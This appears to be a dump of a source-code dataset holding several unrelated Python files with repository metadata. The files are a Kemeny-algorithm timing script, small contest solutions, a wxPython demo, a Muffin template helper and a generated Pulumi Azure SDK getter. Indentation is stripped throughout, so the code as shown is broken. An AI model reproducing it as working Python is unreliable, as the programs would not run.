results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,30,27,29,25,26,30,31,26,30],
[26,0,30,24,33,28,25,29,29,27,27],
[21,21,0,23,23,18,18,23,24,21,23],
[24,27,28,0,26,23,30,29,27,28,26],
[22,18,28,25,0,22,21,26,23,23,22],
[26,23,33,28,29,0,30,32,30,28,31],
[25,26,33,21,30,21,0,30,28,25,26],
[21,22,28,22,25,19,21,0,23,22,24],
[20,22,27,24,28,21,23,28,0,24,27],
[25,24,30,23,28,23,26,29,27,0,27],
[21,24,28,25,29,20,25,27,24,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 199, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,25,21,20,23,22,24,23,22,22],
[27,0,25,17,23,22,20,25,26,28,24],
[26,26,0,22,24,27,24,24,29,31,26],
[30,34,29,0,26,31,23,27,30,28,26],
[31,28,27,25,0,22,25,23,26,20,31],
[28,29,24,20,29,0,24,23,29,28,26],
[29,31,27,28,26,27,0,28,25,26,27],
[27,26,27,24,28,28,23,0,24,27,24],
[28,25,22,21,25,22,26,27,0,26,29],
[29,23,20,23,31,23,25,24,25,0,21],
[29,27,25,25,20,25,24,27,22,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 200, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
pd.DataFrame(results).to_csv("/Users/noeliarico/Desktop/folder-kemeny/2021EJOR/results/mebb/mebb_11_51.csv", index=False, header=False) | [
"[email protected]"
] | |
6ae2af63c360ac6ce8e469d4ef399d5bd20040d2 | 6e4e6b64c035881f1cff39db616b0a80e1568c51 | /JOI7Qual/q1.py | 360741c86f3ad98b0fc70d4bc433923644dfa0f2 | [] | no_license | Lischero/Atcoder | f7471a85ee553e3ae791e3e5670468aea1fa53cc | f674d6a20a56eebdafa6d50d5d2d0f4030e5eace | refs/heads/master | 2020-05-21T16:23:36.095929 | 2018-10-18T04:27:55 | 2018-10-18T04:27:55 | 60,671,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | # -*- coding:utf-8 -*-
N = int(input())
change = 1000 - N
factors = [500, 100, 50, 10, 5, 1]
ans = 0
for factor in factors:
while change >= factor:
change -= factor
ans += 1
print(ans)
| [
"[email protected]"
] | |
e2e6ae133a3c7d5e2a67478e807b2afbce460c4e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02921/s327676216.py | 8d79966a0d9b41817f7a2c90ca060bbf016f3e46 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 625 | py | # -*- coding: utf-8 -*-
## Library
import sys
from fractions import gcd
import math
from math import ceil,floor
import collections
from collections import Counter
import itertools
import copy
## input
# N=int(input())
# A,B,C,D=map(int, input().split())
# S = input()
# yoko = list(map(int, input().split()))
# tate = [int(input()) for _ in range(N)]
# N, M = map(int,input().split())
# P = [list(map(int,input().split())) for i in range(M)]
# S = []
# for _ in range(N):
# S.append(list(input()))
S = input()
T = input()
ans = 0
for i in range(3):
if S[i] == T[i]:
ans += 1
print(ans) | [
"[email protected]"
] | |
8a1420991c7365f09dd23479368f9c23d3c181f4 | 485cf3c70fcaa68689a2b690b6465f1d6bcf21bd | /Python_Coding_Tips/Code_py/Code(实例源码及使用说明)/01/11/2.列表拼接的4种方法/demo04.py | 9c2228030fefdd2ff56cc3049a75ad004b1c1f83 | [] | no_license | lxz0503/study_20190608 | 5ffe08c4704bb00ad8d1980baf16b8f5e7135ff4 | 47c37798140883b8d6dc21ec5da5bc7a20988ce9 | refs/heads/master | 2022-12-23T17:23:45.039015 | 2021-06-23T14:50:19 | 2021-06-23T14:50:19 | 190,884,812 | 1 | 3 | null | 2022-12-15T23:17:33 | 2019-06-08T12:22:56 | Python | UTF-8 | Python | false | false | 1,015 | py | # *_* coding : UTF-8 *_*
# 开发团队 :明日科技
# 开发人员 :Administrator
# 开发时间 :2019/7/1 15:32
# 文件名称 :demo04.py
# 开发工具 :PyCharm
gem = [["大众",643518],["奔驰",319163],["宝马",265051],["福特",252323],["雪铁龙",227967],["奥迪",255300]]
fra = [["雪铁龙", 698985],["雷诺",547704],["大众",259268],["福特",82633],["宝马",84931],["奔驰",73254]]
eng = [["福特",254082],["大众",203150],["雪铁龙",177298],["奔驰",172238],["宝马",172048],["奥迪",143739]]
for item1, item2, item3 in zip(gem, fra, eng):
print(item1[0], item1[1], " ", item2[0], item2[1], " ", item3[0], item3[1])
for item1, item2, item3 in zip(gem, fra, eng):
item11 = item1[0].ljust(8)
item12 = str(item1[1]).ljust(8)
item21 = item2[0].ljust(8)
item22 = str(item2[1]).ljust(8)
item31 = item1[0].ljust(8)
item32 = str(item3[1]).ljust(8)
print(item11+"\t", item12+"\t", " ", item21+"\t", item22+"\t", " ", item31+"\t", item32)
| [
"[email protected]"
] | |
c7c5b0151c352832384a07e85f6e49c5f966ec94 | a0947c2778742aec26b1c0600ceca17df42326cd | /Python/PythonInADay2/CSV-Files-Drill/37of79-87.py | c6d72c705eb76b99aaf1d8f9ab163131ca821099 | [] | no_license | JohnCDunn/Course-Work-TTA | 5758319d4607114914ba9723328658bed8fb2024 | 8c4f60d51007dac2ac4cceb84b0f9666e143c0d7 | refs/heads/master | 2021-01-10T16:37:02.609879 | 2016-02-01T18:05:38 | 2016-02-01T18:05:38 | 49,983,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | import wx
class Frame(wx.Frame):
def __init__(self, title):
wx.Frame.__init__(self, None,\
title=title, size=(300,250))
panel = wx.Panel(self)
wx.SpinCtrl(panel, value='0', pos=(130, 50), size=(70, 25))
app = wx.App()
frame = Frame("wxPython Widgets!")
frame.Show()
app.MainLoop()
| [
"[email protected]"
] | |
3cacda28f5023df250d156ab5a4eff4b61274f2e | dc77896138400114f6770310591fbfb02e36d3cd | /{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/common/utils.py | cf5bc6fc70109d2f501aa0fa00154039301d810c | [
"MIT"
] | permissive | drgarcia1986/cookiecutter-muffin | 97163a66a57d83dc802223ccbd5307bd1896429d | 7aa861787b4280477a726da99cf9de4047b01d91 | refs/heads/master | 2021-01-01T16:34:08.043952 | 2015-08-27T22:19:35 | 2015-08-27T22:31:22 | 40,458,394 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | import muffin
from .. import app
@app.ps.jinja2.context_processor
def current_user_context():
local = muffin.local(app.loop)
current_user = getattr(local, 'current_user')
return {'user': current_user}
| [
"[email protected]"
] | |
bbc418a42973b051de3e9c10d573895219af86b0 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/web/v20200901/get_web_app_slot.py | dae31f66a42b428754b1c8f79c1670fe27468c36 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,519 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetWebAppSlotResult',
'AwaitableGetWebAppSlotResult',
'get_web_app_slot',
'get_web_app_slot_output',
]
@pulumi.output_type
class GetWebAppSlotResult:
"""
A web app, a mobile app backend, or an API app.
"""
def __init__(__self__, availability_state=None, client_affinity_enabled=None, client_cert_enabled=None, client_cert_exclusion_paths=None, client_cert_mode=None, container_size=None, custom_domain_verification_id=None, daily_memory_time_quota=None, default_host_name=None, enabled=None, enabled_host_names=None, host_name_ssl_states=None, host_names=None, host_names_disabled=None, hosting_environment_profile=None, https_only=None, hyper_v=None, id=None, identity=None, in_progress_operation_id=None, is_default_container=None, is_xenon=None, kind=None, last_modified_time_utc=None, location=None, max_number_of_workers=None, name=None, outbound_ip_addresses=None, possible_outbound_ip_addresses=None, redundancy_mode=None, repository_site_name=None, reserved=None, resource_group=None, scm_site_also_stopped=None, server_farm_id=None, site_config=None, slot_swap_status=None, state=None, suspended_till=None, system_data=None, tags=None, target_swap_slot=None, traffic_manager_host_names=None, type=None, usage_state=None):
if availability_state and not isinstance(availability_state, str):
raise TypeError("Expected argument 'availability_state' to be a str")
pulumi.set(__self__, "availability_state", availability_state)
if client_affinity_enabled and not isinstance(client_affinity_enabled, bool):
raise TypeError("Expected argument 'client_affinity_enabled' to be a bool")
pulumi.set(__self__, "client_affinity_enabled", client_affinity_enabled)
if client_cert_enabled and not isinstance(client_cert_enabled, bool):
raise TypeError("Expected argument 'client_cert_enabled' to be a bool")
pulumi.set(__self__, "client_cert_enabled", client_cert_enabled)
if client_cert_exclusion_paths and not isinstance(client_cert_exclusion_paths, str):
raise TypeError("Expected argument 'client_cert_exclusion_paths' to be a str")
pulumi.set(__self__, "client_cert_exclusion_paths", client_cert_exclusion_paths)
if client_cert_mode and not isinstance(client_cert_mode, str):
raise TypeError("Expected argument 'client_cert_mode' to be a str")
pulumi.set(__self__, "client_cert_mode", client_cert_mode)
if container_size and not isinstance(container_size, int):
raise TypeError("Expected argument 'container_size' to be a int")
pulumi.set(__self__, "container_size", container_size)
if custom_domain_verification_id and not isinstance(custom_domain_verification_id, str):
raise TypeError("Expected argument 'custom_domain_verification_id' to be a str")
pulumi.set(__self__, "custom_domain_verification_id", custom_domain_verification_id)
if daily_memory_time_quota and not isinstance(daily_memory_time_quota, int):
raise TypeError("Expected argument 'daily_memory_time_quota' to be a int")
pulumi.set(__self__, "daily_memory_time_quota", daily_memory_time_quota)
if default_host_name and not isinstance(default_host_name, str):
raise TypeError("Expected argument 'default_host_name' to be a str")
pulumi.set(__self__, "default_host_name", default_host_name)
if enabled and not isinstance(enabled, bool):
raise TypeError("Expected argument 'enabled' to be a bool")
pulumi.set(__self__, "enabled", enabled)
if enabled_host_names and not isinstance(enabled_host_names, list):
raise TypeError("Expected argument 'enabled_host_names' to be a list")
pulumi.set(__self__, "enabled_host_names", enabled_host_names)
if host_name_ssl_states and not isinstance(host_name_ssl_states, list):
raise TypeError("Expected argument 'host_name_ssl_states' to be a list")
pulumi.set(__self__, "host_name_ssl_states", host_name_ssl_states)
if host_names and not isinstance(host_names, list):
raise TypeError("Expected argument 'host_names' to be a list")
pulumi.set(__self__, "host_names", host_names)
if host_names_disabled and not isinstance(host_names_disabled, bool):
raise TypeError("Expected argument 'host_names_disabled' to be a bool")
pulumi.set(__self__, "host_names_disabled", host_names_disabled)
if hosting_environment_profile and not isinstance(hosting_environment_profile, dict):
raise TypeError("Expected argument 'hosting_environment_profile' to be a dict")
pulumi.set(__self__, "hosting_environment_profile", hosting_environment_profile)
if https_only and not isinstance(https_only, bool):
raise TypeError("Expected argument 'https_only' to be a bool")
pulumi.set(__self__, "https_only", https_only)
if hyper_v and not isinstance(hyper_v, bool):
raise TypeError("Expected argument 'hyper_v' to be a bool")
pulumi.set(__self__, "hyper_v", hyper_v)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if identity and not isinstance(identity, dict):
raise TypeError("Expected argument 'identity' to be a dict")
pulumi.set(__self__, "identity", identity)
if in_progress_operation_id and not isinstance(in_progress_operation_id, str):
raise TypeError("Expected argument 'in_progress_operation_id' to be a str")
pulumi.set(__self__, "in_progress_operation_id", in_progress_operation_id)
if is_default_container and not isinstance(is_default_container, bool):
raise TypeError("Expected argument 'is_default_container' to be a bool")
pulumi.set(__self__, "is_default_container", is_default_container)
if is_xenon and not isinstance(is_xenon, bool):
raise TypeError("Expected argument 'is_xenon' to be a bool")
pulumi.set(__self__, "is_xenon", is_xenon)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if last_modified_time_utc and not isinstance(last_modified_time_utc, str):
raise TypeError("Expected argument 'last_modified_time_utc' to be a str")
pulumi.set(__self__, "last_modified_time_utc", last_modified_time_utc)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if max_number_of_workers and not isinstance(max_number_of_workers, int):
raise TypeError("Expected argument 'max_number_of_workers' to be a int")
pulumi.set(__self__, "max_number_of_workers", max_number_of_workers)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if outbound_ip_addresses and not isinstance(outbound_ip_addresses, str):
raise TypeError("Expected argument 'outbound_ip_addresses' to be a str")
pulumi.set(__self__, "outbound_ip_addresses", outbound_ip_addresses)
if possible_outbound_ip_addresses and not isinstance(possible_outbound_ip_addresses, str):
raise TypeError("Expected argument 'possible_outbound_ip_addresses' to be a str")
pulumi.set(__self__, "possible_outbound_ip_addresses", possible_outbound_ip_addresses)
if redundancy_mode and not isinstance(redundancy_mode, str):
raise TypeError("Expected argument 'redundancy_mode' to be a str")
pulumi.set(__self__, "redundancy_mode", redundancy_mode)
if repository_site_name and not isinstance(repository_site_name, str):
raise TypeError("Expected argument 'repository_site_name' to be a str")
pulumi.set(__self__, "repository_site_name", repository_site_name)
if reserved and not isinstance(reserved, bool):
raise TypeError("Expected argument 'reserved' to be a bool")
pulumi.set(__self__, "reserved", reserved)
if resource_group and not isinstance(resource_group, str):
raise TypeError("Expected argument 'resource_group' to be a str")
pulumi.set(__self__, "resource_group", resource_group)
if scm_site_also_stopped and not isinstance(scm_site_also_stopped, bool):
raise TypeError("Expected argument 'scm_site_also_stopped' to be a bool")
pulumi.set(__self__, "scm_site_also_stopped", scm_site_also_stopped)
if server_farm_id and not isinstance(server_farm_id, str):
raise TypeError("Expected argument 'server_farm_id' to be a str")
pulumi.set(__self__, "server_farm_id", server_farm_id)
if site_config and not isinstance(site_config, dict):
raise TypeError("Expected argument 'site_config' to be a dict")
pulumi.set(__self__, "site_config", site_config)
if slot_swap_status and not isinstance(slot_swap_status, dict):
raise TypeError("Expected argument 'slot_swap_status' to be a dict")
pulumi.set(__self__, "slot_swap_status", slot_swap_status)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
if suspended_till and not isinstance(suspended_till, str):
raise TypeError("Expected argument 'suspended_till' to be a str")
pulumi.set(__self__, "suspended_till", suspended_till)
if system_data and not isinstance(system_data, dict):
raise TypeError("Expected argument 'system_data' to be a dict")
pulumi.set(__self__, "system_data", system_data)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if target_swap_slot and not isinstance(target_swap_slot, str):
raise TypeError("Expected argument 'target_swap_slot' to be a str")
pulumi.set(__self__, "target_swap_slot", target_swap_slot)
if traffic_manager_host_names and not isinstance(traffic_manager_host_names, list):
raise TypeError("Expected argument 'traffic_manager_host_names' to be a list")
pulumi.set(__self__, "traffic_manager_host_names", traffic_manager_host_names)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if usage_state and not isinstance(usage_state, str):
raise TypeError("Expected argument 'usage_state' to be a str")
pulumi.set(__self__, "usage_state", usage_state)
@property
@pulumi.getter(name="availabilityState")
def availability_state(self) -> str:
"""
Management information availability state for the app.
"""
return pulumi.get(self, "availability_state")
@property
@pulumi.getter(name="clientAffinityEnabled")
def client_affinity_enabled(self) -> Optional[bool]:
"""
<code>true</code> to enable client affinity; <code>false</code> to stop sending session affinity cookies, which route client requests in the same session to the same instance. Default is <code>true</code>.
"""
return pulumi.get(self, "client_affinity_enabled")
@property
@pulumi.getter(name="clientCertEnabled")
def client_cert_enabled(self) -> Optional[bool]:
"""
<code>true</code> to enable client certificate authentication (TLS mutual authentication); otherwise, <code>false</code>. Default is <code>false</code>.
"""
return pulumi.get(self, "client_cert_enabled")
@property
@pulumi.getter(name="clientCertExclusionPaths")
def client_cert_exclusion_paths(self) -> Optional[str]:
"""
client certificate authentication comma-separated exclusion paths
"""
return pulumi.get(self, "client_cert_exclusion_paths")
@property
@pulumi.getter(name="clientCertMode")
def client_cert_mode(self) -> Optional[str]:
"""
This composes with ClientCertEnabled setting.
- ClientCertEnabled: false means ClientCert is ignored.
- ClientCertEnabled: true and ClientCertMode: Required means ClientCert is required.
- ClientCertEnabled: true and ClientCertMode: Optional means ClientCert is optional or accepted.
"""
return pulumi.get(self, "client_cert_mode")
@property
@pulumi.getter(name="containerSize")
def container_size(self) -> Optional[int]:
"""
Size of the function container.
"""
return pulumi.get(self, "container_size")
@property
@pulumi.getter(name="customDomainVerificationId")
def custom_domain_verification_id(self) -> Optional[str]:
"""
Unique identifier that verifies the custom domains assigned to the app. Customer will add this id to a txt record for verification.
"""
return pulumi.get(self, "custom_domain_verification_id")
@property
@pulumi.getter(name="dailyMemoryTimeQuota")
def daily_memory_time_quota(self) -> Optional[int]:
"""
Maximum allowed daily memory-time quota (applicable on dynamic apps only).
"""
return pulumi.get(self, "daily_memory_time_quota")
@property
@pulumi.getter(name="defaultHostName")
def default_host_name(self) -> str:
"""
Default hostname of the app. Read-only.
"""
return pulumi.get(self, "default_host_name")
@property
@pulumi.getter
def enabled(self) -> Optional[bool]:
"""
<code>true</code> if the app is enabled; otherwise, <code>false</code>. Setting this value to false disables the app (takes the app offline).
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="enabledHostNames")
def enabled_host_names(self) -> Sequence[str]:
"""
Enabled hostnames for the app.Hostnames need to be assigned (see HostNames) AND enabled. Otherwise,
the app is not served on those hostnames.
"""
return pulumi.get(self, "enabled_host_names")
@property
@pulumi.getter(name="hostNameSslStates")
def host_name_ssl_states(self) -> Optional[Sequence['outputs.HostNameSslStateResponse']]:
"""
Hostname SSL states are used to manage the SSL bindings for app's hostnames.
"""
return pulumi.get(self, "host_name_ssl_states")
@property
@pulumi.getter(name="hostNames")
def host_names(self) -> Sequence[str]:
"""
Hostnames associated with the app.
"""
return pulumi.get(self, "host_names")
@property
@pulumi.getter(name="hostNamesDisabled")
def host_names_disabled(self) -> Optional[bool]:
"""
<code>true</code> to disable the public hostnames of the app; otherwise, <code>false</code>.
If <code>true</code>, the app is only accessible via API management process.
"""
return pulumi.get(self, "host_names_disabled")
@property
@pulumi.getter(name="hostingEnvironmentProfile")
def hosting_environment_profile(self) -> Optional['outputs.HostingEnvironmentProfileResponse']:
"""
App Service Environment to use for the app.
"""
return pulumi.get(self, "hosting_environment_profile")
@property
@pulumi.getter(name="httpsOnly")
def https_only(self) -> Optional[bool]:
"""
HttpsOnly: configures a web site to accept only https requests. Issues redirect for
http requests
"""
return pulumi.get(self, "https_only")
@property
@pulumi.getter(name="hyperV")
def hyper_v(self) -> Optional[bool]:
"""
Hyper-V sandbox.
"""
return pulumi.get(self, "hyper_v")
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def identity(self) -> Optional['outputs.ManagedServiceIdentityResponse']:
"""
Managed service identity.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter(name="inProgressOperationId")
def in_progress_operation_id(self) -> str:
"""
Specifies an operation id if this site has a pending operation.
"""
return pulumi.get(self, "in_progress_operation_id")
@property
@pulumi.getter(name="isDefaultContainer")
def is_default_container(self) -> bool:
"""
<code>true</code> if the app is a default container; otherwise, <code>false</code>.
"""
return pulumi.get(self, "is_default_container")
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> Optional[bool]:
"""
Obsolete: Hyper-V sandbox.
"""
return pulumi.get(self, "is_xenon")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter(name="lastModifiedTimeUtc")
def last_modified_time_utc(self) -> str:
"""
Last time the app was modified, in UTC. Read-only.
"""
return pulumi.get(self, "last_modified_time_utc")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource Location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="maxNumberOfWorkers")
def max_number_of_workers(self) -> int:
"""
Maximum number of workers.
This only applies to Functions container.
"""
return pulumi.get(self, "max_number_of_workers")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outboundIpAddresses")
def outbound_ip_addresses(self) -> str:
"""
List of IP addresses that the app uses for outbound connections (e.g. database access). Includes VIPs from tenants that site can be hosted with current settings. Read-only.
"""
return pulumi.get(self, "outbound_ip_addresses")
@property
@pulumi.getter(name="possibleOutboundIpAddresses")
def possible_outbound_ip_addresses(self) -> str:
"""
List of IP addresses that the app uses for outbound connections (e.g. database access). Includes VIPs from all tenants except dataComponent. Read-only.
"""
return pulumi.get(self, "possible_outbound_ip_addresses")
@property
@pulumi.getter(name="redundancyMode")
def redundancy_mode(self) -> Optional[str]:
"""
Site redundancy mode
"""
return pulumi.get(self, "redundancy_mode")
@property
@pulumi.getter(name="repositorySiteName")
def repository_site_name(self) -> str:
"""
Name of the repository site.
"""
return pulumi.get(self, "repository_site_name")
@property
@pulumi.getter
def reserved(self) -> Optional[bool]:
"""
<code>true</code> if reserved; otherwise, <code>false</code>.
"""
return pulumi.get(self, "reserved")
@property
@pulumi.getter(name="resourceGroup")
def resource_group(self) -> str:
"""
Name of the resource group the app belongs to. Read-only.
"""
return pulumi.get(self, "resource_group")
@property
@pulumi.getter(name="scmSiteAlsoStopped")
def scm_site_also_stopped(self) -> Optional[bool]:
"""
<code>true</code> to stop SCM (KUDU) site when the app is stopped; otherwise, <code>false</code>. The default is <code>false</code>.
"""
return pulumi.get(self, "scm_site_also_stopped")
@property
@pulumi.getter(name="serverFarmId")
def server_farm_id(self) -> Optional[str]:
"""
Resource ID of the associated App Service plan, formatted as: "/subscriptions/{subscriptionID}/resourceGroups/{groupName}/providers/Microsoft.Web/serverfarms/{appServicePlanName}".
"""
return pulumi.get(self, "server_farm_id")
@property
@pulumi.getter(name="siteConfig")
def site_config(self) -> Optional['outputs.SiteConfigResponse']:
"""
Configuration of the app.
"""
return pulumi.get(self, "site_config")
@property
@pulumi.getter(name="slotSwapStatus")
def slot_swap_status(self) -> 'outputs.SlotSwapStatusResponse':
"""
Status of the last deployment slot swap operation.
"""
return pulumi.get(self, "slot_swap_status")
@property
@pulumi.getter
def state(self) -> str:
"""
Current state of the app.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="suspendedTill")
def suspended_till(self) -> str:
"""
App suspended till in case memory-time quota is exceeded.
"""
return pulumi.get(self, "suspended_till")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> 'outputs.SystemDataResponse':
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="targetSwapSlot")
def target_swap_slot(self) -> str:
"""
Specifies which deployment slot this app will swap into. Read-only.
"""
return pulumi.get(self, "target_swap_slot")
@property
@pulumi.getter(name="trafficManagerHostNames")
def traffic_manager_host_names(self) -> Sequence[str]:
"""
Azure Traffic Manager hostnames associated with the app. Read-only.
"""
return pulumi.get(self, "traffic_manager_host_names")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="usageState")
def usage_state(self) -> str:
"""
State indicating whether the app has exceeded its quota usage. Read-only.
"""
return pulumi.get(self, "usage_state")
class AwaitableGetWebAppSlotResult(GetWebAppSlotResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppSlotResult(
availability_state=self.availability_state,
client_affinity_enabled=self.client_affinity_enabled,
client_cert_enabled=self.client_cert_enabled,
client_cert_exclusion_paths=self.client_cert_exclusion_paths,
client_cert_mode=self.client_cert_mode,
container_size=self.container_size,
custom_domain_verification_id=self.custom_domain_verification_id,
daily_memory_time_quota=self.daily_memory_time_quota,
default_host_name=self.default_host_name,
enabled=self.enabled,
enabled_host_names=self.enabled_host_names,
host_name_ssl_states=self.host_name_ssl_states,
host_names=self.host_names,
host_names_disabled=self.host_names_disabled,
hosting_environment_profile=self.hosting_environment_profile,
https_only=self.https_only,
hyper_v=self.hyper_v,
id=self.id,
identity=self.identity,
in_progress_operation_id=self.in_progress_operation_id,
is_default_container=self.is_default_container,
is_xenon=self.is_xenon,
kind=self.kind,
last_modified_time_utc=self.last_modified_time_utc,
location=self.location,
max_number_of_workers=self.max_number_of_workers,
name=self.name,
outbound_ip_addresses=self.outbound_ip_addresses,
possible_outbound_ip_addresses=self.possible_outbound_ip_addresses,
redundancy_mode=self.redundancy_mode,
repository_site_name=self.repository_site_name,
reserved=self.reserved,
resource_group=self.resource_group,
scm_site_also_stopped=self.scm_site_also_stopped,
server_farm_id=self.server_farm_id,
site_config=self.site_config,
slot_swap_status=self.slot_swap_status,
state=self.state,
suspended_till=self.suspended_till,
system_data=self.system_data,
tags=self.tags,
target_swap_slot=self.target_swap_slot,
traffic_manager_host_names=self.traffic_manager_host_names,
type=self.type,
usage_state=self.usage_state)
def get_web_app_slot(name: Optional[str] = None,
resource_group_name: Optional[str] = None,
slot: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppSlotResult:
"""
A web app, a mobile app backend, or an API app.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. By default, this API returns the production slot.
"""
__args__ = dict()
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
__args__['slot'] = slot
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:web/v20200901:getWebAppSlot', __args__, opts=opts, typ=GetWebAppSlotResult).value
return AwaitableGetWebAppSlotResult(
availability_state=__ret__.availability_state,
client_affinity_enabled=__ret__.client_affinity_enabled,
client_cert_enabled=__ret__.client_cert_enabled,
client_cert_exclusion_paths=__ret__.client_cert_exclusion_paths,
client_cert_mode=__ret__.client_cert_mode,
container_size=__ret__.container_size,
custom_domain_verification_id=__ret__.custom_domain_verification_id,
daily_memory_time_quota=__ret__.daily_memory_time_quota,
default_host_name=__ret__.default_host_name,
enabled=__ret__.enabled,
enabled_host_names=__ret__.enabled_host_names,
host_name_ssl_states=__ret__.host_name_ssl_states,
host_names=__ret__.host_names,
host_names_disabled=__ret__.host_names_disabled,
hosting_environment_profile=__ret__.hosting_environment_profile,
https_only=__ret__.https_only,
hyper_v=__ret__.hyper_v,
id=__ret__.id,
identity=__ret__.identity,
in_progress_operation_id=__ret__.in_progress_operation_id,
is_default_container=__ret__.is_default_container,
is_xenon=__ret__.is_xenon,
kind=__ret__.kind,
last_modified_time_utc=__ret__.last_modified_time_utc,
location=__ret__.location,
max_number_of_workers=__ret__.max_number_of_workers,
name=__ret__.name,
outbound_ip_addresses=__ret__.outbound_ip_addresses,
possible_outbound_ip_addresses=__ret__.possible_outbound_ip_addresses,
redundancy_mode=__ret__.redundancy_mode,
repository_site_name=__ret__.repository_site_name,
reserved=__ret__.reserved,
resource_group=__ret__.resource_group,
scm_site_also_stopped=__ret__.scm_site_also_stopped,
server_farm_id=__ret__.server_farm_id,
site_config=__ret__.site_config,
slot_swap_status=__ret__.slot_swap_status,
state=__ret__.state,
suspended_till=__ret__.suspended_till,
system_data=__ret__.system_data,
tags=__ret__.tags,
target_swap_slot=__ret__.target_swap_slot,
traffic_manager_host_names=__ret__.traffic_manager_host_names,
type=__ret__.type,
usage_state=__ret__.usage_state)
@_utilities.lift_output_func(get_web_app_slot)
def get_web_app_slot_output(name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
slot: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetWebAppSlotResult]:
"""
A web app, a mobile app backend, or an API app.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. By default, this API returns the production slot.
"""
...
| [
"[email protected]"
] | |
7b7fd334b67b1727da4bdc482d2cdcaadfa4dab1 | 0403dcc7cdf0e8174300569969914e885ebc4a9b | /tests/test_scriptdata_longstring.py | e12af73e657048fee3f976929a27d7d4d20b3bfb | [
"BSD-2-Clause"
] | permissive | chrippa/python-flashmedia | 03ea9029ef51871872c87d26384bf8433d8b165c | f5df4987d6d6661a240756435bb8729f82d8d31f | refs/heads/master | 2021-01-19T19:36:09.256165 | 2013-04-29T10:30:07 | 2013-04-29T10:30:07 | 5,651,549 | 15 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,799 | py | # vim: set fileencoding=utf8 :
